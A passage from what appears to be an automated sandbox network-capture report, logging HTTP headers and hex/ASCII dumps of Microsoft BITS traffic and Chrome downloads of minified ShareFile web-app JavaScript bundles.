                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 65 72 29 20 23 61 64 64 44 65 73 63 72 69 70 74 69 6f 6e 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 73 74 72 65 74 63 68 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 67 61 70 3a 38 70 78 7d 3a 69 73 28 3a 69 73 28 2e 64 69 61 6c 6f 67 2e 61 6c 74 54 65 78 74 20 23 61 6c 74 54 65 78 74 43 6f 6e 74 61 69 6e 65 72 29 20 23 61 64 64 44 65 73 63 72 69 70 74 69 6f 6e 29 20 2e 64 65 73 63 72 69 70 74 69 6f 6e 41 72 65 61 7b 66 6c 65 78 3a 31 3b 70 61 64 64 69 6e 67 2d 69 6e 6c 69 6e 65 3a 32 34 70 78 20 31 30 70 78 7d 3a 69 73 28 3a 69 73 28 3a 69 73 28 2e 64 69 61 6c 6f 67 2e 61 6c 74 54 65 78 74 20 23 61 6c 74 54 65 78 74 43 6f 6e 74 61 69 6e 65 72 29 20 23 61 64 64 44 65 73 63 72 69 70 74 69 6f 6e 29
                                                                                                                                                                                                                      Data Ascii: er) #addDescription{align-items:stretch;display:flex;flex-direction:column;gap:8px}:is(:is(.dialog.altText #altTextContainer) #addDescription) .descriptionArea{flex:1;padding-inline:24px 10px}:is(:is(:is(.dialog.altText #altTextContainer) #addDescription)
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC1319INData Raw: 65 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 31 30 70 78 7d 2e 70 64 66 56 69 65 77 65 72 2e 73 69 6e 67 6c 65 50 61 67 65 56 69 65 77 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 70 64 66 56 69 65 77 65 72 2e 73 69 6e 67 6c 65 50 61 67 65 56 69 65 77 20 2e 70 61 67 65 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 64 66 56 69 65 77 65 72 3a 69 73 28 2e 73 63 72 6f 6c 6c 48 6f 72 69 7a 6f 6e 74 61 6c 2c 2e 73 63 72 6f 6c 6c 57 72 61 70 70 65 64 29 2c 2e 73 70 72 65 61 64 7b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 3a 33 2e 35 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 70 64 66 56 69 65 77 65 72 2e 73 63 72 6f 6c 6c 48 6f 72 69 7a 6f 6e 74 61 6c 2c 2e 73 70 72 65 61 64 7b 77 68 69 74
                                                                                                                                                                                                                      Data Ascii: e;margin:0 auto 10px}.pdfViewer.singlePageView{display:inline-block}.pdfViewer.singlePageView .page{border:none;margin:0}.pdfViewer:is(.scrollHorizontal,.scrollWrapped),.spread{margin-inline:3.5px;text-align:center}.pdfViewer.scrollHorizontal,.spread{whit


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      54192.168.2.1749774184.28.90.27443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:11 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                      Host: fs.microsoft.com
                                                                                                                                                                                                                      2024-11-05 19:36:11 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                      Server: ECAcc (chd/0790)
                                                                                                                                                                                                                      X-CID: 11
                                                                                                                                                                                                                      X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                      X-Ms-Region: prod-eus-z1
                                                                                                                                                                                                                      Cache-Control: public, max-age=214088
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:11 GMT
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      X-CID: 2


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      55192.168.2.174977513.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:11 UTC608OUTGET /sharefile-web/sharefiledev-entitlements-pilet/0.1.54/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC590INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 199512
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Fri, 13 Sep 2024 12:33:19 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:12 GMT
                                                                                                                                                                                                                      ETag: "38596d901c05cdcb1b7db1f4d6d21ba7"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 697a26790d3ab8292d8546ca9be87bbc.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: PF8k1WKDYzRlfi1usUHHftz4dYBhWMlVYQD3uE9ecScPMzX7GV8s2Q==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 65 6e 74 69 74 6c 65 6d 65 6e 74 73 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6f 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 7b 73 65 74 74
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledeventitlementspilet,{})System.register(["@sharefiledev/antd-config","antd","react","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={};return Object.defineProperty(o,"__esModule",{value:!0}),{sett
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 4e 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 64 61 74 61 7d 7d 5d 29 2c 6e 7d 28 6b 29 2c 4d 3d 7b 70 72 6f 63 65 73 73 6f 72 73 3a 7b 7d 2c 61 64 64 50 6f 73 74 50 72 6f 63 65 73 73 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 70 72 6f 63 65 73 73 6f 72 73 5b 65 2e 6e 61 6d 65 5d 3d 65 7d 2c 68 61 6e 64 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 2c 6f 29 7b 76 61 72 20 69 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 70 72 6f 63 65 73 73 6f 72 73 5b 65 5d 26 26 28 74 3d 69 2e 70 72 6f 63 65 73 73 6f 72 73 5b 65 5d 2e 70 72 6f 63 65 73 73 28 74 2c 6e 2c 72 2c 6f 29 29 7d 29 29 2c 74 7d 7d 3b 66 75 6e 63 74 69
                                                                                                                                                                                                                      Data Ascii: N",value:function(){return this.data}}]),n}(k),M={processors:{},addPostProcessor:function(e){this.processors[e.name]=e},handle:function(e,t,n,r,o){var i=this;return e.forEach((function(e){i.processors[e]&&(t=i.processors[e].process(t,n,r,o))})),t}};functi
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC8644INData Raw: 75 6e 64 65 66 69 6e 65 64 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 3b 28 30 2c 61 2e 41 29 28 74 68 69 73 2c 65 29 2c 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 55 74 69 6c 73 3d 74 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 72 2c 74 68 69 73 2e 6c 6f 67 67 65 72 3d 78 2e 63 72 65 61 74 65 28 22 70 6c 75 72 61 6c 52 65 73 6f 6c 76 65 72 22 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 61 74 69 62 69 6c 69 74 79 4a 53 4f 4e 26 26 22 76 34 22 21 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 61 74 69 62 69 6c 69 74 79 4a 53 4f 4e 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 49 6e 74 6c 26 26 49 6e 74 6c 2e 50 6c 75 72 61 6c 52 75 6c 65 73 7c 7c 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 61 74 69 62 69
                                                                                                                                                                                                                      Data Ascii: undefined?arguments[1]:{};(0,a.A)(this,e),this.languageUtils=t,this.options=r,this.logger=x.create("pluralResolver"),this.options.compatibilityJSON&&"v4"!==this.options.compatibilityJSON||"undefined"!=typeof Intl&&Intl.PluralRules||(this.options.compatibi
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 65 6c 61 74 69 76 65 74 69 6d 65 22 3d 3d 3d 74 26 26 6f 2e 69 6e 64 65 78 4f 66 28 22 3a 22 29 3c 30 29 6e 2e 72 61 6e 67 65 7c 7c 28 6e 2e 72 61 6e 67 65 3d 6f 2e 74 72 69 6d 28 29 29 3b 65 6c 73 65 7b 6f 2e 73 70 6c 69 74 28 22 3b 22 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 65 29 7b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 64 2e 41 29 28 65 29 7c 7c 28 30 2c 70 2e 41 29 28 65 29 7c 7c 28 30 2c 68 2e 41 29 28 65 29 7c 7c 28 30 2c 6d 2e 41 29 28 29 7d 28 65 2e 73 70 6c 69 74 28 22 3a 22 29 29 2c 72 3d 74 5b 30 5d 2c 6f 3d 74 2e 73 6c 69 63 65 28 31 29 2e 6a 6f 69 6e 28 22 3a 22 29 2e 74 72 69 6d 28 29 2e 72 65 70 6c 61 63 65 28 2f 5e 27 2b 7c 27 2b 24 2f 67 2c 22 22 29 3b 6e 5b
                                                                                                                                                                                                                      Data Ascii: elativetime"===t&&o.indexOf(":")<0)n.range||(n.range=o.trim());else{o.split(";").forEach((function(e){if(e){var t=function(e){return(0,d.A)(e)||(0,p.A)(e)||(0,h.A)(e)||(0,m.A)()}(e.split(":")),r=t[0],o=t.slice(1).join(":").trim().replace(/^'+|'+$/g,"");n[
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC6606INData Raw: 75 6e 64 65 66 69 6e 65 64 2c 6e 2e 73 65 74 52 65 73 6f 6c 76 65 64 4c 61 6e 67 75 61 67 65 28 65 29 7d 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 65 7c 7c 69 7c 7c 21 6e 2e 73 65 72 76 69 63 65 73 2e 6c 61 6e 67 75 61 67 65 44 65 74 65 63 74 6f 72 7c 7c 28 69 3d 5b 5d 29 3b 76 61 72 20 61 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 69 3f 69 3a 6e 2e 73 65 72 76 69 63 65 73 2e 6c 61 6e 67 75 61 67 65 55 74 69 6c 73 2e 67 65 74 42 65 73 74 4d 61 74 63 68 46 72 6f 6d 43 6f 64 65 73 28 69 29 3b 61 26 26 28 6e 2e 6c 61 6e 67 75 61 67 65 7c 7c 6f 28 61 29 2c 6e 2e 74 72 61 6e 73 6c 61 74 6f 72 2e 6c 61 6e 67 75 61 67 65 7c 7c 6e 2e 74 72 61 6e 73 6c 61 74 6f 72 2e 63 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 61 29 2c 6e 2e 73 65 72 76 69 63 65 73
                                                                                                                                                                                                                      Data Ascii: undefined,n.setResolvedLanguage(e)},i=function(i){e||i||!n.services.languageDetector||(i=[]);var a="string"==typeof i?i:n.services.languageUtils.getBestMatchFromCodes(i);a&&(n.language||o(a),n.translator.language||n.translator.changeLanguage(a),n.services
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 74 29 7d 2c 74 2e 70 3d 22 22 2c 74 28 74 2e 73 3d 31 29 7d 28 5b 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 3b 76 61 72 20 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 3b 72 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 72 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 72 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 72 26 26 28 72 2e 77 72 69 74
                                                                                                                                                                                                                      Data Ascii: otype.hasOwnProperty.call(e,t)},t.p="",t(t.s=1)}([function(e,t,n){Object.defineProperty(t,"__esModule",{value:!0});var r=function(){function e(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writ
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 5c 5c 73 2a 5c 5c 29 3f 22 29 2c 6c 3d 7b 43 53 53 5f 55 4e 49 54 3a 6e 65 77 20 52 65 67 45 78 70 28 73 29 2c 72 67 62 3a 6e 65 77 20 52 65 67 45 78 70 28 22 72 67 62 22 2b 75 29 2c 72 67 62 61 3a 6e 65 77 20 52 65 67 45 78 70 28 22 72 67 62 61 22 2b 63 29 2c 68 73 6c 3a 6e 65 77 20 52 65 67 45 78 70 28 22 68 73 6c 22 2b 75 29 2c 68 73 6c 61 3a 6e 65 77 20 52 65 67 45 78 70 28 22 68 73 6c 61 22 2b 63 29 2c 68 73 76 3a 6e 65 77 20 52 65 67 45 78 70 28 22 68 73 76 22 2b 75 29 2c 68 73 76 61 3a 6e 65 77 20 52 65 67 45 78 70 28 22 68 73 76 61 22 2b 63 29 2c 68 65 78 33 3a 2f 5e 23 3f 28 5b 30 2d 39 61 2d 66 41 2d 46 5d 7b 31 7d 29 28 5b 30 2d 39 61 2d 66 41 2d 46 5d 7b 31 7d 29 28 5b 30 2d 39 61 2d 66 41 2d 46 5d 7b 31 7d 29 24 2f 2c 68 65 78 36 3a 2f 5e 23
                                                                                                                                                                                                                      Data Ascii: \\s*\\)?"),l={CSS_UNIT:new RegExp(s),rgb:new RegExp("rgb"+u),rgba:new RegExp("rgba"+c),hsl:new RegExp("hsl"+u),hsla:new RegExp("hsla"+c),hsv:new RegExp("hsv"+u),hsva:new RegExp("hsva"+c),hex3:/^#?([0-9a-fA-F]{1})([0-9a-fA-F]{1})([0-9a-fA-F]{1})$/,hex6:/^#
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 29 3f 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 42 6c 6f 62 3f 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 29 3a 42 75 66 66 65 72 2e 66 72 6f 6d 28 65 29 3a 65 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 61 29 7b 69 66 28 72 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 65 29 7c 7c 72 2e 69 73 41 72 72 61 79 28 65 29 29 7b 69 66 28 2d 31 21 3d 3d 6e 2e 69 6e 64 65 78 4f 66 28 65 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 69 72 63 75 6c 61 72 20 72 65 66 65 72 65 6e 63 65 20 64 65 74 65 63 74 65 64 20 69 6e 20 22 2b 61 29 3b 6e 2e 70 75 73 68 28 65 29 2c 72 2e 66 6f 72 45 61 63 68 28 65 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 69 66 28 21 72 2e 69 73 55 6e 64 65 66 69 6e 65 64 28 65 29 29 7b 76 61 72 20 73 2c 75 3d 61
                                                                                                                                                                                                                      Data Ascii: )?"function"==typeof Blob?new Blob([e]):Buffer.from(e):e}return function i(e,a){if(r.isPlainObject(e)||r.isArray(e)){if(-1!==n.indexOf(e))throw Error("Circular reference detected in "+a);n.push(e),r.forEach(e,(function(e,n){if(!r.isUndefined(e)){var s,u=a
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC3684INData Raw: 20 6d 69 6c 20 6e 65 74 20 6f 72 67 20 22 2c 72 65 3a 22 20 61 73 73 6f 20 63 6f 6d 20 6e 6f 6d 20 22 2c 72 75 3a 22 20 61 63 20 61 64 79 67 65 79 61 20 61 6c 74 61 69 20 61 6d 75 72 20 61 72 6b 68 61 6e 67 65 6c 73 6b 20 61 73 74 72 61 6b 68 61 6e 20 62 61 73 68 6b 69 72 69 61 20 62 65 6c 67 6f 72 6f 64 20 62 69 72 20 62 72 79 61 6e 73 6b 20 62 75 72 79 61 74 69 61 20 63 62 67 20 63 68 65 6c 20 63 68 65 6c 79 61 62 69 6e 73 6b 20 63 68 69 74 61 20 63 68 75 6b 6f 74 6b 61 20 63 68 75 76 61 73 68 69 61 20 63 6f 6d 20 64 61 67 65 73 74 61 6e 20 65 2d 62 75 72 67 20 65 64 75 20 67 6f 76 20 67 72 6f 7a 6e 79 20 69 6e 74 20 69 72 6b 75 74 73 6b 20 69 76 61 6e 6f 76 6f 20 69 7a 68 65 76 73 6b 20 6a 61 72 20 6a 6f 73 68 6b 61 72 2d 6f 6c 61 20 6b 61 6c 6d 79 6b
                                                                                                                                                                                                                      Data Ascii: mil net org ",re:" asso com nom ",ru:" ac adygeya altai amur arkhangelsk astrakhan bashkiria belgorod bir bryansk buryatia cbg chel chelyabinsk chita chukotka chuvashia com dagestan e-burg edu gov grozny int irkutsk ivanovo izhevsk jar joshkar-ola kalmyk
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC12700INData Raw: 20 54 79 70 65 45 72 72 6f 72 28 22 6e 75 6c 6c 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 61 72 67 75 6d 65 6e 74 20 66 6f 72 20 55 52 49 22 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 68 72 65 66 28 65 29 2c 74 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 74 68 69 73 2e 61 62 73 6f 6c 75 74 65 54 6f 28 74 29 3a 74 68 69 73 7d 69 2e 76 65 72 73 69 6f 6e 3d 22 31 2e 31 39 2e 31 31 22 3b 76 61 72 20 61 3d 69 2e 70 72 6f 74 6f 74 79 70 65 2c 73 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 2f 28 5b 2e 2a 2b 3f 5e 3d 21 3a 24 7b 7d 28 29 7c 5b 5c 5d 5c 2f 5c 5c 5d 29 2f 67 2c 22 5c 5c 24 31 22 29 7d 66 75 6e 63 74 69
                                                                                                                                                                                                                      Data Ascii: TypeError("null is not a valid argument for URI");return this.href(e),t!==undefined?this.absoluteTo(t):this}i.version="1.19.11";var a=i.prototype,s=Object.prototype.hasOwnProperty;function u(e){return e.replace(/([.*+?^=!:${}()|[\]\/\\])/g,"\\$1")}functi


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      56192.168.2.174977613.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:11 UTC609OUTGET /sharefile-web/sharefiledev-notification-center/0.11.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC590INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 463080
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2024 23:07:31 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:13 GMT
                                                                                                                                                                                                                      ETag: "b4c879d3598119e0e769c9a0e8a15bf0"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 4fa61644a4cc2dfcb32e66f7e29f0076.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: RBD98gI0Hc907V1Tj6MsNdNrKxYisDIoPTwKlzf1U8Uzs-I1PikeIw==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 6e 6f 74 69 66 69 63 61 74 69 6f 6e 63 65 6e 74 65 72 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 6f 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevnotificationcenter,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","tslib"],(function(e,t){var n={},r={},i={},a={},s={},o={},c={};return{setters:[function
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC5036INData Raw: 69 71 75 65 20 69 64 65 6e 74 69 66 69 65 72 20 66 6f 72 20 79 6f 75 72 20 42 65 61 6d 73 20 69 6e 73 74 61 6e 63 65 22 2c 74 79 70 65 3a 22 73 74 72 69 6e 67 22 2c 72 65 71 75 69 72 65 64 3a 21 30 7d 2c 7b 6b 65 79 3a 6f 2e 53 65 63 72 65 74 4b 65 79 2c 64 69 73 70 6c 61 79 4e 61 6d 65 3a 22 53 65 63 72 65 74 20 4b 65 79 22 2c 64 65 73 63 72 69 70 74 69 6f 6e 3a 22 54 68 65 20 73 65 63 72 65 74 20 6b 65 79 20 79 6f 75 72 20 73 65 72 76 65 72 20 77 69 6c 6c 20 75 73 65 20 74 6f 20 61 63 63 65 73 73 20 79 6f 75 72 20 42 65 61 6d 73 20 69 6e 73 74 61 6e 63 65 22 2c 74 79 70 65 3a 22 73 74 72 69 6e 67 22 2c 72 65 71 75 69 72 65 64 3a 21 30 7d 2c 2e 2e 2e 45 5d 2c 6d 65 3d 5b 7b 6b 65 79 3a 6f 2e 41 63 63 65 73 73 4b 65 79 2c 64 69 73 70 6c 61 79 4e 61 6d 65
                                                                                                                                                                                                                      Data Ascii: ique identifier for your Beams instance",type:"string",required:!0},{key:o.SecretKey,displayName:"Secret Key",description:"The secret key your server will use to access your Beams instance",type:"string",required:!0},...E],me=[{key:o.AccessKey,displayName
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC16384INData Raw: 50 52 49 53 45 3d 22 65 6e 74 65 72 70 72 69 73 65 22 2c 65 2e 55 4e 4c 49 4d 49 54 45 44 3d 22 75 6e 6c 69 6d 69 74 65 64 22 7d 28 71 65 7c 7c 28 71 65 3d 7b 7d 29 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 49 4e 5f 41 50 50 3d 22 69 6e 5f 61 70 70 22 2c 65 2e 4d 55 4c 54 49 5f 43 48 41 4e 4e 45 4c 3d 22 6d 75 6c 74 69 5f 63 68 61 6e 6e 65 6c 22 2c 65 2e 44 45 4c 41 59 3d 22 64 65 6c 61 79 22 2c 65 2e 54 52 41 4e 53 4c 41 54 49 4f 4e 3d 22 74 72 61 6e 73 6c 61 74 69 6f 6e 22 2c 65 2e 44 49 47 45 53 54 3d 22 64 69 67 65 73 74 22 7d 28 48 65 7c 7c 28 48 65 3d 7b 7d 29 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 45 4e 47 49 4e 45 45 52 3d 22 65 6e 67 69 6e 65 65 72 22 2c 65 2e 45 4e 47 49 4e 45 45 52 49 4e 47 5f 4d 41 4e 41 47 45 52 3d 22 65 6e 67
